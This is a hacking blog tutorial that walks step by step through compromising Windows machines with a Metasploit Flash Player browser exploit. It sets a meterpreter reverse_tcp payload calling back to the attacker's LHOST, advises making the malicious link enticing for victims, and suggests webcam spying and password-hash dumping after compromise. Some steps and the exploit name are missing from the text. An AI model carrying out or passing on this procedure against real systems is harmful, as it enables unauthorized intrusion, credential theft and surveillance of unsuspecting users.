Hacking Windows (XP, Vista, 7, 8) Using Flash
Player
In this tutorial, we will look at one way to hack
Flash Player with Metasploit
that works on nearly all Windows platforms, from XP up to Windows 8.
Flash Player is such a fertile ground for
vulnerabilities and exploits that it is worth your time and trouble to consider
developing your own zero day exploit for this poorly designed and troubled application.
Step 1: Check for Vulnerabilities
Let's start by looking at the known vulnerabilities
to the Adobe Flash Player by going to my favorite vulnerability database, Symantec's
SecurityFocus, at the following link.
When you open up this URL, go to Vendor and select "Adobe" from
the drop-down box, followed by "Flash Player" in the Title section. Leave the Version section untouched so that it
provides us with Adobe Flash Player's vulnerabilities for all versions.
As you can see, Adobe Flash Player has 9 pages of
vulnerabilities and 13 of the vulnerabilities have been revealed in just the
last month. No matter how many times Adobe patches this application, the
vulnerabilities never stop!
Step 2: Fire Up Kali and Start Metasploit
Now that we know that Adobe Flash Player is fertile
ground for us to hack, let's fire up Kali Linux and open Metasploit.
Now,
let's use the built-in search function in Metasploit to find Adobe exploits.
msf >
search adobe
As
you can see, Metasploit has one called:
This is a relatively new exploit, just having been released on April
28th, 2014. Let's use that one.
Step 3: Set the Options
To
use this exploit, simply type:
msf > info
Note that this exploit will work on all operating
systems from Windows XP to Windows 8 with Internet Explorer 6 through 11 with
Flash 11, 12, and 13. That is a whole lot of vulnerable systems!
Before we start our exploit, let's check to see what options we need to set.
msf > show options
As you can see in the screenshot above, this
exploit has numerous options, but all of them are already set with default values.
The two you may want to change (but are
not required) are the SVRPORT (8080) and the URIPATH. Note that if you do not
change the URIPATH, it will be set using your IP address and a random string.
If you are looking to entice someone to click on this link, you may want to
make the URI more enticing.
Step 4: Set the Payload
Now, we need to set the payload that we want to
deliver to the victim system. Ideally, we always want to deliver the meterpreter, if
we can. Some exploits will allow us to deliver the meterpreter and others will
not. In this case, we can deliver the meterpreter, so let's go for it!
msf > set
PAYLOAD windows/meterpreter/reverse_tcp
Now,
set the local host IP (LHOST).
set LHOST 192.168.147.129
Running this exploit is clean and simple. Just type
"exploit" and it creates and starts a web server and a path to the
malicious code that will exploit Adobe's Flash
Player.
Step 6: Navigate to the Web
Server from a Windows Machine
Now, let's go over to our Windows 7 machine and
enter the URL of our malicious web server that we built in Metasploit.
While we are doing that, we can see in Metasploit that things are stirring. A connection is being established netween the Windows 7 and our Kali system running Metasploit.
If
we are patient, we will be rewarded with a meterpreter command on the Windows 7 system.
Congrats! You own that system.
Step 7: Meterpreter
With the meterpreter on the victim system, we now
have the ability and option to run any of the meterpreter scripts that I've
listed here on Null Byte for you. For instance, you can turn on the webcam
with webcam.rb or grab the password hashes with hashdump.rb.
Adobe's Flash Player continues to provide us with
fertile ground to hack Windows and other systems with its plethora of vulnerabilities.
No comments:
Post a Comment